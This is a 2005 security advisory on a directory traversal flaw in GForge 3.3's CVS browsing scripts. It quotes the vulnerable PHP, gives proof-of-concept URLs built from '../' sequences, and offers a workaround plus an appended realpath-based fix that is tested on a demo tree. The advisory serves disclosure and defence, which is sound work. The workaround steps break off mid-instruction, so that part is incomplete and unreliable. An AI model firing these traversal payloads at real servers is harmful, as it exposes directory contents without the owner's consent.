STG Security Advisory: [SSA-20050120-24] GForge 3.x directory traversal vulnerability.

Revision 1.0
Date Published: 2005-01-20 (KST)
Last Update: 2005-01-20 (KST)
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
=======
GForge is software that supports collaborative development in software communities. It provides a fully configured development system, with communication and version-control tools for the members of a development team, on a web site.

The GForge CVS modules have a directory traversal vulnerability that attackers can exploit.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
Low: arbitrary directory listing disclosure.

Affected Products
=================
GForge 3.3 and prior

Not Affected Products
=====================
GForge 4.0 and later

Vendor Status: FIXED (GForge 4.0)
=================================
2004-12-28 Vulnerability found
2004-12-28 Developers (Dragos Moinescu, Ronald Petty) contacted and confirmed.
2004-12-28 Dragos Moinescu suggested the workaround for his module.
2004-12-29 Vendor contacted.
2005-01-20 Official release.

Details
=======
The GForge CVS module written by Dragos Moinescu and the one written by Ronald Petty both have a directory traversal vulnerability.

$GFORGE/www/scm/controller.php doesn't sanitize the $dir variable.

- ---
if(!$dir) {
    $dir = $cvsroot;
    $files = retrieveDir($dir);
    ...snip...
} else {
    // $dir comes straight from the request and reaches the filesystem unchecked
    $files = retrieveDir($dir);
- ---

$GFORGE/www/scm/controlleroo.php doesn't sanitize the $dir_name variable.

- ---
// $dir_name is appended to the CVS root without any ".." check
$DIRNAME = ($dir_name != "")?"/$dir_name":"";
$DIRNAME = $CVSROOT.$DIRNAME;
$DIRPATH = explode("/",$dir_name);
echo("Current directory: ");
for($i=0;$i<count($DIRPATH);$i++) {
    ...snip...
}
if(!($dirContent = $DHD->readDirectory($DIRNAME)))
    echo("Error: ".$DHD->getError());
...snip...
foreach($dirContent AS $k=>$v) {
    ...snip...
    $fileLink = ...snip...
- ---

If register_globals = On (in php.ini), attackers can read arbitrary directory listings.
Proof of Concept
================
1) http://[victim]/scm/controller.php?group_id=[number]
   &dir=/cvsroot/[project]/CVSROOT/../../../../../
2) http://[victim]/scm/controlleroo.php?group_id=[number]
   &dir_name=../../../&hide_attic=0

Solution
========
Upgrade to GForge 4.x

Workaround
==========
Dragos Moinescu suggested the workaround for his module.

- ---
modify $GFORGE/common/include/cvsweb/DirectoryHandler.class

function openDirectory() {
    if($this->__DIR_NAME == "" || strstr($this->__DIR_NAME, "..")) {
        $this->setError("You must provide a valid directory name");
        return false;
    }
- ---

But the above workaround doesn't remove the vulnerability in controller.php (by Ronald Petty). You can restrict users to using only cvsweb.

modify $GFORGE/www/scm/index.php (follow this step).
1) find '
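The workaround above rejects ".." substrings, which is a blocklist rather than a proof that the requested directory lies inside the CVS root. The following is an added example, not GForge code: it canonicalizes the requested path with realpath() and accepts it only if the result is the root or sits under it, then runs the two Proof of Concept inputs and a legitimate one against a constructed temporary tree. The function name safe_retrieve_dir and the sample tree are assumptions.

```php
<?php
// Added example (not GForge code): confine a user-supplied directory to the
// configured CVS root before listing it. Function name and sample tree are assumed.
function safe_retrieve_dir(string $cvsroot, string $dir): array
{
    // Canonical root; realpath() returns false if the root does not exist.
    $root = realpath($cvsroot);
    if ($root === false) {
        throw new RuntimeException("CVS root is not available");
    }
    // Embedded NUL bytes truncate paths in the underlying C calls.
    if (strpos($dir, "\0") !== false) {
        throw new InvalidArgumentException("Invalid directory name");
    }
    // Empty request means the root itself; otherwise the value is relative to
    // the root, the same way controlleroo.php builds $DIRNAME.
    $candidate = ($dir === "") ? $root : $root . "/" . $dir;
    // realpath() resolves "..", symlinks and duplicate slashes, and returns
    // false for paths that do not exist.
    $resolved = realpath($candidate);
    if ($resolved === false || !is_dir($resolved)) {
        throw new InvalidArgumentException("Invalid directory name");
    }
    // Containment check on the canonical path. The trailing separator keeps
    // a sibling such as "/cvsroot2" from passing for a root of "/cvsroot".
    if ($resolved !== $root
        && strncmp($resolved, $root . "/", strlen($root) + 1) !== 0) {
        throw new InvalidArgumentException("Directory is outside the CVS root");
    }
    return array_values(array_diff(scandir($resolved), [".", ".."]));
}

// Constructed demo tree: a CVS root with one project, plus a file outside it.
$base = sys_get_temp_dir() . "/gforge_demo_" . getmypid();
mkdir("$base/cvsroot/project/CVSROOT", 0700, true);
touch("$base/cvsroot/project/CVSROOT/modules");
touch("$base/secret.txt");

// A legitimate request followed by the two traversal patterns from the PoC.
$requests = ["project/CVSROOT", "../../../", "project/CVSROOT/../../../../../"];
foreach ($requests as $req) {
    try {
        $names = implode(",", safe_retrieve_dir("$base/cvsroot", $req));
        printf("%-35s -> listed: %s\n", $req, $names);
    } catch (InvalidArgumentException $e) {
        printf("%-35s -> rejected (%s)\n", $req, $e->getMessage());
    }
}
```

Both traversal requests resolve to an existing directory above the root and are rejected by the containment check, while the in-root request lists "modules".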